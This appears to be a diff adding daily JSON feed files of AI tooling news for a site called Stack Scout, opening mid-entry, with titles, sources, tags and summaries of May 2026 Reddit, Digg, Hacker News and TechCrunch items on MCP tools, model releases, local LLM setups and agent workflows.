"summary": "Anthropic acquired Stainless on Monday for a reported $300M+. Most coverage is framing this as a developer tools acquisition. Stainless is best known for generating the official Python and Node SDKs that ship with OpenAI, Google, Meta, Cloudflare, and Anthropic. The SDK story is real. The MCP side is the part that matters here. Stainless was one of the first vendors to extend their compiler to produce MCP servers from the same OpenAPI specs that produce their SDKs. MCP hit \\~97M monthly SDK downloads by December 2025 and around 10,000 production servers by early 2026. A lot of that production code was Stainless-generated. Anthropic now owns the dominant MCP server generator. What actually changed hands on Monday: 1. The engineering team. Roughly 40-50 people including founder Alex Rattray, who previously built Stripe's patented SDK generation system. Now reporting to Katelyn Lesse in Anthropic's Platform Engineering org. 2. The technology. The generator, the templates, the language-specific runtimes, the OpenAPI extensions Stainless invented for SDK-specific edge cases. 3. The hosted product is winding down. New signups stopped Monday. New SDK and MCP server generations stopped Mo…", + "category": "ai_tools" + }, + { + "title": "favorite Agentic Coding Harness", + "url": "https://reddit.com/r/LocalLLaMA/comments/1th5t1b/favorite_agentic_coding_harness/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-18T23:53:49.000Z", + "summary": "So far, I’ve tried Codex CLI, Claude Code, Gemini CLI, OpenCode, and recently, Pi with local models. Pi is the leanest of them all, with just four tools: read, write, edit, and bash. Its system prompt is only under 2K tokens, and it's perfect for local models. I've been trying out Qwen 27B-MXFP8 with it, and it's much better than I expected! It doesn't have fancy bells and whistles like multi agents, but the only thing I’m missing is searching the web for documentation. I’m sure you can get it through an extension, but you probably won’t get the same robust search features you get from commercial platforms anyways. This might be my new favorite! What’s yours?", + "category": "ai_models" + }, + { + "title": "Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advan…", + "url": "https://x.com/AlternativeTo/status/2056637498978398395", + "source": "X / @alternativeto", + "tags": [ + "mcp", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "mcp", + "cli_tool", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-05-19T07:26:04.000Z", + "summary": "Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advanced users. https:// alternativeto.net/news/2026/5/tr ipsy-adds-mcp-integration-and-cli-support-for-ai-powered-travel-planning-and-organization/ …", + "category": "ai_tools" + }, + { + "title": "Google introduces Gemini Spark, a 24/7 agentic assistant with Gmail integration", + "url": "https://techcrunch.com/2026/05/19/google-introduces-gemini-spark-a-24-7-agentic-assistant-with-gmail-integration/", + "source": "TechCrunch AI", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-19T19:45:37.747Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Edison Scientific announces partnership with Incyte to deploy Kosmos AI agent across full drug development pipeline from molecular design through FDA approval — Incyte becomes first company to integrate the system end-to-end.", + "url": "https://www.digg.com/ai/r5p7scr1?rank=3", + "source": "Digg AI", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-19T19:45:35.257Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Why is LM-Studio download page showing me 0.4.7 to download when the latest version is 0.4.13?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1thx8eo/why_is_lmstudio_download_page_showing_me_047_to/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 1, + "date": "2026-05-19T19:17:46.000Z", + "summary": "I'm currently running LM-Studio 0.4.12. In the app if I check for updates it says there's a new version (0.4.13), I can read the changelog for 0.4.13, but when I go to [https://lmstudio.ai/download](https://lmstudio.ai/download) it shows 0.4.7. What's going on here? Anyone knows?", + "category": "ai_models" + }, + { + "title": "OpenAI cofounder Andrej karpathy just joined anthropic and the talent war is officially over", + "url": "https://reddit.com/r/ClaudeAI/comments/1thw3bu/openai_cofounder_andrej_karpathy_just_joined/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-19T18:40:02.000Z", + "summary": "this happened literally today ,andrej karpathy one of the most respected ai researchers alive nd the guy whose youtube lectures taught half the developers in this sub how neural networks work, just announced he is joining anthropic's pre training team. He's the 3rd senior openai figure to defect to anthropic in under two years. Jan leike left in may 2024, John schulman (co-founder) left in august 2024 and now karpathy. He is joining the pre training team under nick josef and building a new team focused on using claude to accelerate pre training research which means Anthropic is betting that claude can help make itself smarter, thats recursive self improvement with one of the most capable researchers in the world leading it. The musk trial verdict came in yesterday with the jury ruling in altman's favor, karpathy announces today voilaa . The timing is either coincidental or the most savage talent acquisition move in tech history. I hv been watching this trajectory while building my own workflows on claude ,every month the ecosystem around claude gets stronger. The connectors mean claude orchestrates professional creative tools natively, the api means platforms like magic hour and k…", + "category": "ai_tools" + }, + { + "title": "Floor for local meeting summarization on a 6GB GPU: qwen3.5:0.8b works at 57s, Granite 4 350M hallucinates", + "url": "https://reddit.com/r/LocalLLaMA/comments/1thsset/floor_for_local_meeting_summarization_on_a_6gb/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-19T16:50:50.000Z", + "summary": "Disclosure: I made this. Open-source, MIT, Windows + Linux. Not affiliated with [voiceflow.com](http://voiceflow.com) (the chatbot SaaS, name collision, sorry). Why this exists: I wanted local-only dictation and meeting transcription, because audio shouldn't have to leave the machine just to become text. I had a 6GB GPU sitting there doing nothing most of the day. So I built it: hold a hotkey, faster-whisper transcribes locally, text pastes at the cursor. v1.6.0 shipped today and adds the meetings recorder: mic + system audio into one stereo file, transcribed locally, summary goes through whatever endpoint you point it at (Ollama, llama.cpp, Groq, OpenAI). The only network call in the whole product is the optional summary, and you pick where it goes. The on-topic part for this sub: mini models on real workloads. v1.6.0 was the excuse to actually benchmark this on real meeting transcripts instead of toy prompts. I tried the latest small Qwen first, qwen3.5:0.8b (873M, Q8\\_0). Test rig: RTX 3060 Laptop 6GB, \\~4.3GB free after Whisper loads, Ollama 0.23, Arch. Input: a real 4-minute meeting, \\~2900 chars. It works, with one caveat. Ollama's VRAM-aware default num\\_ctx on this GPU is…", + "category": "ai_models" + }, + { + "title": "bytedance released an open source model that attempts to do just about anything with only 3b parameters", + "url": "https://reddit.com/r/LocalLLaMA/comments/1thkwgk/bytedance_released_an_open_source_model_that/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-19T12:05:26.000Z", + "summary": "Lance is a lightweight native unified multimodal model that supports **image and video understanding, generation, and editing** within a single framework. * **Efficient at 3B scale.** With only **3B active parameters**, Lance delivers strong performance across image generation, image editing, and video generation benchmarks. * **Trained from scratch.** Lance is built with a staged multi-task recipe and trained entirely from scratch within a **128-A100-GPU** budget.", + "category": "ai_models" + }, + { + "title": "How I built a 9-agent team where my agents actually talk to each other", + "url": "https://reddit.com/r/ClaudeAI/comments/1thi16y/how_i_built_a_9agent_team_where_my_agents/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-19T09:50:18.000Z", + "summary": "I've been running Claude Code for 6 months, shipping my product and running content/launch ops for it. The thing that kept breaking wasn't the agents themselves. It was me. Every handoff between research and write and code and review was me copy pasting context between sessions. I was the dispatcher and context holder for my own AI team Tried gstack first. The roles are great but I'm still the one cycling through slash commands. /office-hours → /plan-eng-review → /review → /ship. Good output, but I'm orchestrating every step Spent a weekend porting my workflow over. Here's the lineup: **Engineering (4 agents)** * arch: owns architectural decisions. Reviews proposed changes before code starts. Soul: \"senior staff engineer, asks 'what breaks at 10x' before approving anything * backend: owns /api, /services. Implements after arch greenlights * frontend: owns /web. Picks up from backend when API contracts are stable * review: reads every PR before I do. Catches the lazy stuff so I only review substantive changes **Growth/Content (5 agents)** * research: uses ahrefs MCP to analyse keywords/opportunities/market and hands off to strategist * strategist: reads research, writes campaign br…", + "category": "ai_tools" + }, + { + "title": "We have sub-agents at home", + "url": "https://reddit.com/r/LocalLLaMA/comments/1th8a43/we_have_subagents_at_home/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-19T01:38:42.000Z", + "summary": "At work I get unfettered access to gpt 5.4 and sonnet, so I'm quite used to spawning sub-agents to go crazy on a repo and split up tasks. At home I am VRAM poor and like to run the models locally for my own enjoyment. Almost every single sub-agent extension/implementation does not account for any of the restrictions imposed by having 10gb of VRAM and a single slot for a KV cache (thats already quantized). I already work as a developer, so I qwen3.6-35b-a3b tagged teamed a partially vibe-coded fork of an existing sub-agent repository for pi coding agent. This is really only relevant if you: * Use pi coding agent as your harness * Can only run a single LLM at a time with 1 slot via llama.cpp server * Want to use sub-agents without fully reprocessing your prompts after the sub-agent is done Repo is [here](https://github.com/BenjaminBilbro/pi-subagent), feel free to use it or fork it idc. I am also interested in how others around here have dealt with sub-agents on a purely local and VRAM constrained setup. I was also planning to add the ability for sub-agents to be spawned with no previous context, and manage the saving and storing the main context via \\`--slot-save-path\\` and the \\`s…", + "category": "ai_models" + }, + { + "title": "Glia – Local-first shared memory layer (SQLite-vec + FTS5 + Offline Knowledge Graph)", + "url": "https://reddit.com/r/ChatGPT/comments/1ther0u/glia_localfirst_shared_memory_layer_sqlitevec/", + "source": "Reddit r/ChatGPT", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-05-19T06:46:11.000Z", + "summary": "Hey everyone, I wanted to share a project I've been working on called Glia. It is a 100% offline, local-first RAG and memory layer designed to connect your AI web chats (Claude, ChatGPT, DeepSeek) with your local developer tools (Claude Code, Cursor, Windsurf) using a unified local database. I wanted something lightweight that did not require pulling heavy Docker containers or subscribing to third-party memory APIs. I settled on a Node.js + SQLite architecture running sqlite-vec (for 768-dim float32 embeddings) alongside SQLite FTS5 for hybrid search, powered completely by local Ollama instances. We just launched a live website that outlines the details and demonstrates the features in action: * Website: [https://glia-ai.vercel.app/](https://glia-ai.vercel.app/) * Codebase: [https://github.com/Eshaan-Nair/Glia-AI](https://github.com/Eshaan-Nair/Glia-AI) Technical Stack & Features: * Hybrid Search Retrieval: SQLite-vec (using nomic-embed-text locally) + FTS5 keyword prefix matching (porter stemmer). * Surgical Sentence-level Trimming: Chunks are sliced into sentences. When a prompt is intercepted, only the exact matching sentences are pulled out of the vector store instead of t…", + "category": "ai_tools" + }, + { + "title": "Centralize SKILLs", + "url": "https://reddit.com/r/ClaudeAI/comments/1thc7pg/centralize_skills/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-19T04:35:20.000Z", + "summary": "We recently tried to roll out an AI agent workflow across a 60-person company, and we found out 1. need to centralize the SKILLs files 2. update, versioning markdown file supporting multi users is a challenge Does Claude enterprise version offer any solution? or there are any open source project helping company to manage skills ? Since these are just text files, we could hack together a workaround using SharePoint to distribute them internally. But are there any actual purpose-built tools for this?", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-20.json b/data/news-feed-2026-05-20.json new file mode 100644 index 0000000..d7cf033 --- /dev/null +++ b/data/news-feed-2026-05-20.json @@ -0,0 +1,261 @@ +{ + "generated": "2026-06-05T00:44:41.365Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-20", + "article_count": 15, + "archived_story_count": 630, + "articles": [ + { + "title": "Antigravity unifies its agentic surfaces under a single platform incorporating Antigravity 2.0 desktop app, CLI, SDK, and IDE for consistent access across environments", + "url": "https://www.digg.com/ai/xizlma81", + "source": "Digg AI", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-20T06:02:26.989Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Put your spare Claude cycles on night shift: help review open-source packages", + "url": "https://reddit.com/r/ClaudeAI/comments/1tizbag/put_your_spare_claude_cycles_on_night_shift_help/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-20T21:15:12.000Z", + "summary": "Hello, I’m building Thirdpass, a tool/service for coordinating collaborative package review to reduce software supply-chain risk. The basic idea: there are far too many packages for humans to manually review, but lots of us now have AI coding agents sitting around with spare capacity. Thirdpass tries to turn that into useful coverage by assigning packages/files to review, collecting the results, and cross ref against local project dependencies. It currently supports packages from: - crates.io - PyPI - npm - Ansible Galaxy I added a “night shift” mode, so you can point Claude at the shared review backlog and let it work through package reviews continuously: ``` thirdpass review-any --nightshift ``` The reviews are first-pass supply-chain reviews: suspicious install scripts, unexpected network behavior, credential handling, sketchy build steps, weird package metadata, and so on. Partial coverage still helps. I’m looking for people who want to: - run the CLI and donate spare Claude tokens to secure OSS - improve the review prompts/agent workflow - build more registry extensions I started this project years ago after thinking a lot about `cargo-crev` and collaborative review. My curre…", + "category": "ai_tools" + }, + { + "title": "Re. what ever happened to Cohere’s Command-A series of models?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tizmar/re_what_ever_happened_to_coheres_commanda_series/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-20T21:25:50.000Z", + "summary": "Hey everyone, Nick Frosst here from Cohere. A few months ago Aidan (my cofounder) [left a comment](https://www.reddit.com/r/LocalLLaMA/comments/1rf8nou/comment/o8rkdrf/) in here about our Command series and how we were working on some more powerful, open-weights models behind the scenes. We just launched Command A+ and we wanted to share it with you guys. TLDR is we built a really efficient model. It’s our first MoE model, which is exciting. There’s obvs work to do on top-line performance but it’s easily looking like one of the fastest and most responsive models in our category. We also pulled off some incredible quantization work so it runs really well on even 1 or 2 GPUs. Like with R7B, we really prioritized making the model practical, so smaller teams and devs could realistically use it to build the kind of agents we ship for our platform customers. That’s also why it’s under Apache 2.0. Just total, near unfettered access to a pretty awesome model. We’re enterprise-first but honestly, we get so much out of our open-source community that makes us more innovative and creative. The feedback you give will almost certainly influence how we think about models and product going forwar…", + "category": "ai_models" + }, + { + "title": "Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software — The launch targets developers and organizations with constrained compute resources.", + "url": "https://www.digg.com/ai/tvrhpn35?rank=1", + "source": "Digg AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-20T18:00:28.460Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software", + "url": "https://www.digg.com/ai/tvrhpn35", + "source": "Digg AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-20T18:00:28.444Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Gemini 3.5 Flash Benchmarks Change The Workhorse Model Race", + "url": "https://x.com/koraykv/status/2056795667088204234", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-19T23:32:37.527Z", + "summary": "Gemini 3.5 Flash launched with strong numbers on agentic, coding, ARC AGI, and speed focused benchmarks.", + "category": "ai_tools" + }, + { + "title": "Remove-AI-Watermarks – CLI and library for removing AI watermarks from images", + "url": "https://github.com/wiltodelta/remove-ai-watermarks", + "source": "Hacker News", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.88, + "date": "2026-05-19T22:30:31.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Seven questions decide whether your AI agent ships. Most teams can answer two.", + "url": "https://natesnewsletter.substack.com/p/agent-infrastructure-control-layer", + "source": "Nate's Newsletter", + "tags": [ + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "tool_update", + "agent_tool" + ], + "importance": 0.82, + "date": "2026-05-20T18:00:37.499Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "open source Gemini CLI", + "url": "https://github.com/google-gemini/gemini-cli", + "source": "Simon Willison's Blog", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 0.74, + "date": "2026-05-20T18:00:39.277Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Antigravity SDK", + "url": "https://github.com/google-antigravity/antigravity-sdk-python", + "source": "Simon Willison's Blog", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.74, + "date": "2026-05-20T18:00:39.270Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "After a year in Claude Code, the thing slowing me down turned out to be me", + "url": "https://reddit.com/r/ClaudeAI/comments/1ti8cwr/after_a_year_in_claude_code_the_thing_slowing_me/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.7, + "date": "2026-05-20T02:31:50.000Z", + "summary": "I have used Claude Code daily for about a year. I kept assuming the way to get faster was a better model or a sharper prompt. It was neither. The slow part was me, and I had stopped noticing. There is an old xkcd (#1205, \"Is It Worth the Time?\") that charts how long you can spend automating a task before the automation costs more than it saves. It assumes the expensive part of automating is you, sitting down to build the thing. That assumption is dead. An agent writes the script in the time it takes to describe it. So almost everything is worth automating now, and the only real skill left is noticing what to automate. It sorted into four categories for me. Each one has a \"tell,\" a thing you catch yourself doing: - Connect: you're copy-pasting between tools, alt-tabbing, ferrying data by hand. Fix is an MCP server or a CLI so the agent reaches the source itself. - Encode: you're running the same sequence of steps again. Fix is a script or a skill. - Teach: you're typing the same instructions or context again. Fix is putting it in CLAUDE.md or a skill. - Parallelize: you're sitting and watching one agent work. Fix is running several. The last one was the big one. When an agent is ge…", + "category": "ai_tools" + }, + { + "title": "Stability AI releases a new audio model that can create 6-minute songs", + "url": "https://techcrunch.com/2026/05/20/stability-ai-release-a-new-audio-model-that-can-create-six-minute-songs/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-20T18:00:30.801Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Exa raised $250 million in a Series C at a $2.2 billion valuation led by Andreessen Horowitz, reporting 400,000 developers and 5,000 company adopters for its AI agent search platform — Token usage grew 20x for agent-driven queries.", + "url": "https://www.digg.com/ai/1te0bqvt?rank=2", + "source": "Digg AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-20T18:00:28.463Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "AI server under 5k?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tirzfm/ai_server_under_5k/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-20T17:06:50.000Z", + "summary": "I have a framework desktop 128GB and a 3080 12GB running qwen 7b I want to move to a proper server rack + switch but not sure how to move from desktop PC to server rack. Any advice on what GPU/Server to get under 5k? Or at that price just stick to workstation?", + "category": "ai_models" + }, + { + "title": "under 2% quality gap but 10x cost difference: tested 5 models on identical tool calling tasks[D]", + "url": "https://reddit.com/r/MachineLearning/comments/1tiqsao/under_2_quality_gap_but_10x_cost_difference/", + "source": "Reddit r/MachineLearning", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-05-20T16:25:46.000Z", + "summary": "I've been running a file management agent built on MCP for a few months. It handles module renames, import updates, validation scaffolding, test execution. A typical session is 60 to 120 tool calls. The whole thing was powered by Opus 4.7 because I never thought to question it until I looked at my April bill. So I set up a comparison. Eight refactoring tasks on a 15k line Python project, same MCP tools, same system prompt, same repo state, five models. Tasks were things like \"rename this module and fix all imports\" and \"add input validation to these 12 endpoints.\" Routine cleanup, nothing requiring deep architectural thought. The metric I cared about was first attempt tool call success: did the model produce a valid function call that executed without a parse error on the first try? On the expensive end, Opus 4.7 hit roughly 98 to 99 percent across a bit over 500 calls and cost close to $15 for all eight tasks. GPT 5 was similar quality for around $11. The cheaper tier surprised me. Sonnet 4.6 landed somewhere around 96 percent for about $4. DeepSeek V4 Pro was in the same neighborhood for under $2. And Tencent Hunyuan Hy3 preview came in within a couple of points of Opus for unde…", + "category": "ai_research" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-21.json b/data/news-feed-2026-05-21.json new file mode 100644 index 0000000..0e17d42 --- /dev/null +++ b/data/news-feed-2026-05-21.json @@ -0,0 +1,277 @@ +{ + "generated": "2026-06-05T00:44:42.106Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-21", + "article_count": 15, + "archived_story_count": 634, + "articles": [ + { + "title": "Anthropic officially launched 13+ FREE AI courses with certificates (Including Agentic AI and Claude Code!)", + "url": "https://reddit.com/r/ClaudeAI/comments/1tjpfh8/anthropic_officially_launched_13_free_ai_courses/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-21T16:16:09.000Z", + "summary": "Just found out about this and had to share because almost nobody is talking about it yet. If you are tired of paying for AI courses or getting hit with paywalls just to get a certificate, Anthropic (the creators of Claude) quietly dropped a massive library of completely free, official training modules. Yes, they actually give you an official certificate of completion directly from Anthropic once you finish. Here is the breakdown of what is available and exactly how to get it without spending a dime. What is in the course catalog? They have split the training into a few different paths depending on what you want to do: * **The Big Surprise: Agentic AI & MCP:** They have official courses on the Model Context Protocol (MCP). This is the cutting-edge tech used to build AI Agents that can browse your local computer, use tools, and execute tasks autonomously. * **Claude Code 101:** Dedicated developer modules for their new command-line agent. It teaches you how to let Claude edit your codebase, run tests, and use its new \"Plan Mode.\" * **API & Cloud Architecture:** Deep dives into building with the Claude API, plus corporate tracks for deploying Claude securely inside Amazon Bed…", + "category": "ai_tools" + }, + { + "title": "Qwen releases Qwen3.7-Max, its latest flagship model for agent workloads that achieves 69.7 on Terminal-Bench 2.0 and completed a 35-hour kernel optimization with over 1,000 tool calls — Supports multi-file coding agents, MCP integrations, and multi-agent orchestration.", + "url": "https://www.digg.com/ai/5rbia2h1?rank=4", + "source": "Digg AI", + "tags": [ + "mcp", + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-21T18:00:16.708Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "I built a zero-code visual client to test remote MCP servers instantly (Tested with Cloudflare’s free MCP).", + "url": "https://reddit.com/r/ClaudeAI/comments/1tjpzfg/i_built_a_zerocode_visual_client_to_test_remote/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "mcp", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-21T16:34:53.000Z", + "summary": "Hey everyone, The Model Context Protocol (MCP) is amazing for standardizing how agents talk to data, but I got incredibly frustrated every time I wanted to quickly test a new remote MCP server. Writing custom client-side boilerplate or wrestling with CLI tools just to see if a tool actually exposes the right schema is a massive time sink. So, I built a native MCP client directly into the visual canvas of **AgentSwarms**. You can now test any remote MCP server entirely in the browser without writing a single line of code. **Here is the workflow I just tested with Cloudflare:** Cloudflare released a free MCP server for their documentation. Instead of building a local client to test it: 1. I dropped their SSE URL into the new MCP Servers integration in AgentSwarms. 2. The canvas immediately connected and extracted the available tools (e.g., `cloudflare-docs-search`). 3. I wired that tool up to a basic agent and started asking complex infrastructure questions in natural language. The agent successfully used the MCP tool to pull live docs and synthesize an answer. **Why this is useful for AI devs:** If you are building your own MCP servers, you need a fast way to visually test if your…", + "category": "ai_tools" + }, + { + "title": "I did what Microsoft wouldn't - updated POML VS Code extension", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tjine7/i_did_what_microsoft_wouldnt_updated_poml_vs_code/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-21T12:14:07.000Z", + "summary": "**What's a POML?** Microsoft came up with this really cool HTML style mark-up language that allows you to make modular prompt templates, with all sorts of neat features like **local AI support via OpenAI API**, setting runtime parameters for your LLM, and embedding documents into the prompt. You could even send the prompt directly to your LLM via the VS Code extension. **What happened to it?** I don't fucking know. They supported it for 2-3 months, then ghosted when it didn't hit KPIs or something, I guess. Then a VS Code or dependency update exposed a bug in how they handled `/>`, which is actually **fairly common** in POML when you embed documents. This broke the ability to directly send prompts to the LLM - you could copy them out of the preview, but it was slower and less efficient. **What I did** I used [OpenCode](https://opencode.ai/) (which doesn't get enough play here - I only found out about it because someone posted a repo for an **extension** to it) and the [opencode-power-pack](https://github.com/waybarrios/opencode-power-pack) (said extension) to try to find the bug and update some of the more egregiously outdated dependencies. It took me a couple of days to get wo…", + "category": "ai_models" + }, + { + "title": "Show HN: Rmux – A programmable terminal multiplexer with a Playwright-style SDK", + "url": "https://github.com/helvesec/rmux", + "source": "Hacker News", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.82, + "date": "2026-05-21T09:22:00.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "I built Hivemind, a Claude Code plugin that turns your repeated prompts into auto-generated skills", + "url": "https://reddit.com/r/ClaudeAI/comments/1tjw0ah/i_built_hivemind_a_claude_code_plugin_that_turns/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-05-21T19:57:22.000Z", + "summary": "Disclosure: I work on Hivemind. Per the subreddit rules, posting with a full description of what it is and how it works. **What it is** Hivemind is an open-source Claude Code plugin. It installs into Claude Code, watches the traces from your sessions, finds patterns you repeat, and crystallizes them into reusable skills that show up as native slash commands in Claude Code. Because it's a plugin and not an external tool, the skills it generates drop in as proper Claude Code slash commands. No external tool calls, no separate config files to maintain. **What it does in practice** Every morning for about a week, I was writing the same long prompt to Claude Code to pull together a team standup review. Same structure, same context blocks, slightly different details each day. I never thought to turn it into a custom slash command. Hivemind noticed the pattern and built `/team-standup` for me on its own. I didn't configure it or ask for it; it watched the repeats and crystallized the skill. Other slash commands it's built from my team's usage: an environment-aware database debugging command that knows our dev vs prod clusters and kubectl context, a PostHog SDK testing helper, a few other…", + "category": "ai_tools" + }, + { + "title": "LlamaStation v0.9 — llama.cpp GUI for Windows with multi-backend support, TurboQuant, MTP and more", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tjm58w/llamastation_v09_llamacpp_gui_for_windows_with/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-21T14:25:20.000Z", + "summary": "I've been building this for the past few months as a side project — started because I didn't want to run llama.cpp from the command line every time I wanted to try a model. I just wanted something that worked with a click. Fair warning: I'm not a developer. This is 100% vibe coded with AI assistance. If something in the codebase makes you cringe, please be kind and open a PR instead 🙏 Most frontends either hide everything behind abstractions (Ollama, LM Studio) or leave you writing command lines manually. LlamaStation tries to sit in the middle: a clean UI with full access to every parameter. What makes it different Runs llama-server directly — no intermediate layer, no daemon, no abstraction. LlamaStation launches llama-server.exe as a subprocess with full control over every flag. What you configure is exactly what gets passed to the binary. This means you get the full performance of llama.cpp with none of the overhead that tools like Ollama add on top. Multiple backends, switchable from the UI: ⚡ Official llama.cpp (with MTP support since PR #22673) 🔬 TurboQuant fork — asymmetric KV cache quantization. This is the killer feature for me: 200k+ context on 24GB VRAM (dual RTX 306…", + "category": "ai_models" + }, + { + "title": "'Am I OpenAI compatible' - a tool and documentation for unified api signatures in open source AI.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tjgceg/am_i_openai_compatible_a_tool_and_documentation/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-21T10:26:06.000Z", + "summary": "This has turned out to be useful to many of my friends so I thought I'd share here as well. I created a tool and documentation page for most major open-souce project's adherence to 'OpenAI compatibility' after seeing inconsistencies between engines like vLLM and llama.cpp. Now official and unofficial signatures are documented. 